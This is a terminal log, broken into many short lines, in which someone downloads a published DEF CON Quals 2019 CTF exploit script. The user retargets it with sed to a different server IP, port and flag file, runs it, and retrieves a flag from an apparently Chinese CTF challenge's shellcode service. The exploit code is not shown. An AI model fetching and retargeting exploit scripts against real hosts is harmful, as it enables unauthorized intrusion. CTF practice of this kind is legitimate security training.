$ wget
'https://github.com/david942j/ctf-writeups/raw/master/defcon-quals-2019/hotel-california/hotel.py'
-
-
2020
-
04
-
24
10
:
31
:
22
-
-
https:
/
/
github.com
/
david942j
/
ctf
-
writeups
/
raw
/
master
/
defcon
-
quals
-
2019
/
hotel
-
california
/
hotel.py
Resolving github.com (github.com)...
15.164
.
81.167
Connecting to github.com (github.com)|
15.164
.
81.167
|:
443.
.. connected.
HTTP request sent, awaiting response...
302
Found
Location: https:
/
/
raw.githubusercontent.com
/
david942j
/
ctf
-
writeups
/
master
/
defcon
-
quals
-
2019
/
hotel
-
california
/
hotel.py [following]
-
-
2020
-
04
-
24
10
:
31
:
22
-
-
https:
/
/
raw.githubusercontent.com
/
david942j
/
ctf
-
writeups
/
master
/
defcon
-
quals
-
2019
/
hotel
-
california
/
hotel.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)...
151.101
.
0.133
,
151.101
.
64.133
,
151.101
.
128.133
, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|
151.101
.
0.133
|:
443.
.. connected.
HTTP request sent, awaiting response...
200
OK
Length:
1244
(
1.2K
) [text
/
plain]
Saving to: ‘hotel.py’
hotel.py
100
%
[
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
=
>]
1.21K
-
-
.
-
KB
/
s
in
0s
2020
-
04
-
24
10
:
31
:
23
(
19.6
MB
/
s)
-
‘hotel.py’ saved [
1244
/
1244
]
$ sed
-
i s
/
hotelcalifornia.quals2019.oooverflow.io
/
47.102
.
223.17
/
g hotel.py
$ sed
-
i s
/
7777
/
10000
/
g hotel.py
$ sed
-
i s
/
FLAG.txt
/
flag
/
g hotel.py
$ python hotel.py mdzz
<...略...>
[
*
] Switching to interactive mode
Welcome to the
2020kanxueCTF
.
\x00
S
Shellcode > \x00
(get
1024
bytes)
We are We failed!
Shellcode > \x00
(get
0
bytes)
flag{a01e62c0
-
17f8
-
4ec9
-
8be6
-
37e0a768f5d8
}
[
*
] Closed connection to
47.102
.
223.17
port
10000
[
*
] Got EOF
while
reading
in
interactive